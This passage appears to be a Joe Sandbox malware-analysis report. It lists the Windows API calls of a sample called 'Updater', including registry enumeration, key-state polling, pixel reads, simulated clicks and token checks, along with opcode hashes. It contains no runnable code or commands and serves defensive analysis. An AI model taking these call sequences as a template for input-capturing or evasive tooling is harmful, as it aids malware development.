                                                                                                  • Instruction ID: 6578fdc7258bea2c47f72651cc1008e87cddd4c1890df53b8bf4ce4fd8c09bcb
                                                                                                  • Opcode Fuzzy Hash: 54e999f4c9b69ba9916602573064b9483fbb81d45c483346e51e0fc2e40c46e4
                                                                                                  • Instruction Fuzzy Hash: 276151719083019FD750EF24C885AABBBE5FF89750F00492EF98697291EB74D904CB96
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 0075D398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075C0AE,?,?), ref: 0075D3B5
                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075C4A5
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075C500
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0075C563
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0075C5A6
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0075C5B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3132563372-0
                                                                                                  • Opcode ID: f2ce1cf6f5857d9b02f3df6eab89790d3b042c4757096cb9d7d6a17e26ec8bbe
                                                                                                  • Instruction ID: 804c5bdd999b94bb56952ad8f769f0dbc59189128b69f1bd4155723b69142cba
                                                                                                  • Opcode Fuzzy Hash: f2ce1cf6f5857d9b02f3df6eab89790d3b042c4757096cb9d7d6a17e26ec8bbe
                                                                                                  • Instruction Fuzzy Hash: AB61CF31608341AFC315DF64C490F6ABBE5BF84308F14895DF85A8B2A2DB75ED49CB92
                                                                                                  APIs
                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0074968D
                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007496B9
                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00749711
                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00749736
                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0074973E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                  • String ID:
                                                                                                  • API String ID: 2832842796-0
                                                                                                  • Opcode ID: d33a94e3b911e7e1ddedeb3f8fec3f7edf9f83822d12419579e66d67a82ed0a0
                                                                                                  • Instruction ID: 82e87c8e808348bad2e229dbe66b523a7b341c5e4ba2f8d4647d9d7a415383a2
                                                                                                  • Opcode Fuzzy Hash: d33a94e3b911e7e1ddedeb3f8fec3f7edf9f83822d12419579e66d67a82ed0a0
                                                                                                  • Instruction Fuzzy Hash: D4514935A00219EFCB11DF65C891A6ABBF6FF48314F04C099E909AB362CB35ED41CB95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a0f63a3fd18dc08ed7f2c3709e9c5c716f4c7f10251cadf9c032fcad113c5305
                                                                                                  • Instruction ID: 56ab53039ae23304e42d98c215de6fcd6dd37ffee7f5ad59984ad770cecc641c
                                                                                                  • Opcode Fuzzy Hash: a0f63a3fd18dc08ed7f2c3709e9c5c716f4c7f10251cadf9c032fcad113c5305
                                                                                                  • Instruction Fuzzy Hash: 05412631A08204AFC728CF2CCC48FA57B65EB09394F1543A5FC1BA72E1C778AD11DA90
                                                                                                  APIs
                                                                                                  • GetCursorPos.USER32(?), ref: 006E4B88
                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 006E4BA5
                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 006E4BE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4210589936-0
                                                                                                  • Opcode ID: f1c9f47087e34b5bce99e75715fb22ab61daee322668a9d70850ef4a133b1de8
                                                                                                  • Instruction ID: cbeecb925794d38c1637bcaf461470becc23fb443a3be6ee652a256e6eec6ab0
                                                                                                  • Opcode Fuzzy Hash: f1c9f47087e34b5bce99e75715fb22ab61daee322668a9d70850ef4a133b1de8
                                                                                                  • Instruction Fuzzy Hash: 26419431A0621AFFDF159F64C944BEEB775FB08320F208259E429A7290CB396D90CB65
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNEL32(00000002), ref: 007462C9
                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0074634B
                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00746371
                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00746396
                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007463C2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileHardLink$AttributesDeleteErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 4077537916-0
                                                                                                  • Opcode ID: 079776a3a2cbe43f3eb2430f9f4c2ff90990841ab68b4a78d2cf7557c70d1b03
                                                                                                  • Instruction ID: db5e92bfc0daae6a2142514a53c6f3e185b7a00b822118f3c5391c995b57ab57
                                                                                                  • Opcode Fuzzy Hash: 079776a3a2cbe43f3eb2430f9f4c2ff90990841ab68b4a78d2cf7557c70d1b03
                                                                                                  • Instruction Fuzzy Hash: 34417135600620EFCB10DF15C544A5DBBE2FF5A710B158089E95A9B362CB79FE01CB96
                                                                                                  APIs
                                                                                                  • GetWindowRect.USER32(?,?), ref: 00732A2F
                                                                                                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 00732ADB
                                                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 00732AE3
                                                                                                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 00732AF4
                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00732AFC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3382505437-0
                                                                                                  • Opcode ID: e0d957bb6241492353ef0e4e84f6267e7ba72840c4a73703052bb6ddf6323024
                                                                                                  • Instruction ID: c6946a1476e1c64bbea42b6788286239c11564b6dbf4f2cfd53e8cf4a71291d3
                                                                                                  • Opcode Fuzzy Hash: e0d957bb6241492353ef0e4e84f6267e7ba72840c4a73703052bb6ddf6323024
                                                                                                  • Instruction Fuzzy Hash: BA31F671A00219EFDB24CFA8CD89ADE7BB5EB04315F108219FD25AB2D2C3B49D51CB90
                                                                                                  APIs
                                                                                                  • IsWindow.USER32(00000000), ref: 0075151D
                                                                                                  • GetForegroundWindow.USER32 ref: 00751534
                                                                                                  • GetDC.USER32(00000000), ref: 00751570
                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 0075157C
                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 007515B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 4156661090-0
                                                                                                  • Opcode ID: 319c350f5147e052e920bdac0f42015238a3f58a6f135a18c4404669953f10c4
                                                                                                  • Instruction ID: c0a3b8040e6350857783fb40b31a5ac0aa320d4351dbdaf59e9c5c8d15a5baa6
                                                                                                  • Opcode Fuzzy Hash: 319c350f5147e052e920bdac0f42015238a3f58a6f135a18c4404669953f10c4
                                                                                                  • Instruction Fuzzy Hash: 5521CF35A00214AFD714DF65D888AAEB7E5EF88351B008029F84A87362DB74EC44CB90
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0070CBF6
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070CC19
                                                                                                    • Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070CC3F
                                                                                                  • _free.LIBCMT ref: 0070CC52
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070CC61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: e7519e41141d910c6b201db2a1353fcfaaa92b4cecf284875870dd8c81f352ca
                                                                                                  • Instruction ID: 9888778243aeba94090fbdaa8e1fef938e99492436219048221e9548d02ebe05
                                                                                                  • Opcode Fuzzy Hash: e7519e41141d910c6b201db2a1353fcfaaa92b4cecf284875870dd8c81f352ca
                                                                                                  • Instruction Fuzzy Hash: AB018D76A01315FFB73617779C8CC7B7AADDEC6B513154319FA09C6281DEA88C0191B4
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,?,007026D1,0070281A,?,?,006DFC79,?,?,006D111E), ref: 00702CD4
                                                                                                  • _free.LIBCMT ref: 00702D09
                                                                                                  • _free.LIBCMT ref: 00702D30
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00702D3D
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00702D46
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: fb23735855556f44b1df2000a060f3963b20b982bd31e5cab3c5ce511b7cddff
                                                                                                  • Instruction ID: 5bb21a9538a6379767bd5ef4ee35cfea80df7c9e04aaaf23dfd069520ad10f93
                                                                                                  • Opcode Fuzzy Hash: fb23735855556f44b1df2000a060f3963b20b982bd31e5cab3c5ce511b7cddff
                                                                                                  • Instruction Fuzzy Hash: 4101D137304701EBD3266639AC8EA5B26E99BD5765B318325F905A22E3FEACCC035024
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,014A6C78,?,?,00000000), ref: 014A6BF9
                                                                                                    • Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977
                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,014A6C78,?,?,00000000), ref: 014A6C29
                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000CB2D,00000000,00000000,00000004), ref: 014A6C34
                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,014A6C78,?,?,00000000), ref: 014A6C52
                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000CB69,00000000,00000000,00000003), ref: 014A6C5D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                  • String ID:
                                                                                                  • API String ID: 4102113445-0
                                                                                                  • Opcode ID: 590b3d91c3d7759a9ebb798f348527814522192c227b05af2d81494be59c1e06
                                                                                                  • Instruction ID: 0590fa34d9564860ca733152a82e7b57ff49d22ce729cf11635793eca0e06ef0
                                                                                                  • Opcode Fuzzy Hash: 590b3d91c3d7759a9ebb798f348527814522192c227b05af2d81494be59c1e06
                                                                                                  • Instruction Fuzzy Hash: 0C017BB4A006057BE201EA72CC11F5A356CEB75710FE7012BF000E62F0EBB49F009160
                                                                                                  APIs
                                                                                                  • CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310C8
                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310E3
                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 007310F1
                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 00731101
                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,?,?,?,?,-C000001E,00000001,?,00730FDC,80070057), ref: 0073110D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3897988419-0
                                                                                                  • Opcode ID: 629d424391fa6ac8f1f1a6518bf4b8508973b4735890d5227af8243336981eed
                                                                                                  • Instruction ID: db9160ab6c013b796e075ee561f4aed709413153cc4d7af177561690faec5f24
                                                                                                  • Opcode Fuzzy Hash: 629d424391fa6ac8f1f1a6518bf4b8508973b4735890d5227af8243336981eed
                                                                                                  • Instruction Fuzzy Hash: 3801DF72A11309AFEB204F55CC48BAABBACEB44761F124024FE09D3211E7B9CD409BA0
                                                                                                  APIs
                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0073221E
                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 0073222A
                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 00732239
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00731CA1,?,?,?), ref: 00732240
                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00732257
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 842720411-0
                                                                                                  • Opcode ID: ec1daf907013efe0669aba77e1012c0b72c7d44c5b106fb83dbdd1409d2d3a22
                                                                                                  • Instruction ID: 1698a4c33334211ddbba4af6da37891cd12a9b0e01dfad4b35451c91b1bc301a
                                                                                                  • Opcode Fuzzy Hash: ec1daf907013efe0669aba77e1012c0b72c7d44c5b106fb83dbdd1409d2d3a22
                                                                                                  • Instruction Fuzzy Hash: 6301A2B5600305BFDB214F65DC0896B3B6EFF89360F224054FD45C3321CAB59C018A60
                                                                                                  APIs
                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00732134
                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00732140
                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0073214F
                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00732156
                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0073216C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 44706859-0
                                                                                                  • Opcode ID: 2382057038bbe0a192a3147b3f1cf4ac9cfde58d4092890b6be4cb9421b6863f
                                                                                                  • Instruction ID: 46b802e52b46dd59f9a2801ce6e17ca569af078072325dff8bdac36bf179509c
                                                                                                  • Opcode Fuzzy Hash: 2382057038bbe0a192a3147b3f1cf4ac9cfde58d4092890b6be4cb9421b6863f
                                                                                                  • Instruction Fuzzy Hash: 1AF0CD75310309BBEB221FA9EC48F563BBDEF89360F114410FA46D72A1CAB8DC018A60
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00736C3D
                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00736C54
                                                                                                  • MessageBeep.USER32(00000000), ref: 00736C6C
                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00736C88
                                                                                                  • EndDialog.USER32(?,00000001), ref: 00736CA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 3741023627-0
                                                                                                  • Opcode ID: 6bb31d049a6665e7db533fa5868d4c326b49904265cf35f5fc99ee0bccdca115
                                                                                                  • Instruction ID: a74649b246fdd68b621ad0574c8af3d59e7581cb60b547807ffc140a252a0987
                                                                                                  • Opcode Fuzzy Hash: 6bb31d049a6665e7db533fa5868d4c326b49904265cf35f5fc99ee0bccdca115
                                                                                                  • Instruction Fuzzy Hash: BC01A230A10308ABFB315B24DD4EB967778FB00705F008659F587A10E1DBE8BD548AA5
                                                                                                  APIs
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 00741182
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 0074118F
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 0074119C
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411A9
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411B6
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00740FE5,?,007440D1,?,00000001,00718E5C,?), ref: 007411C3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
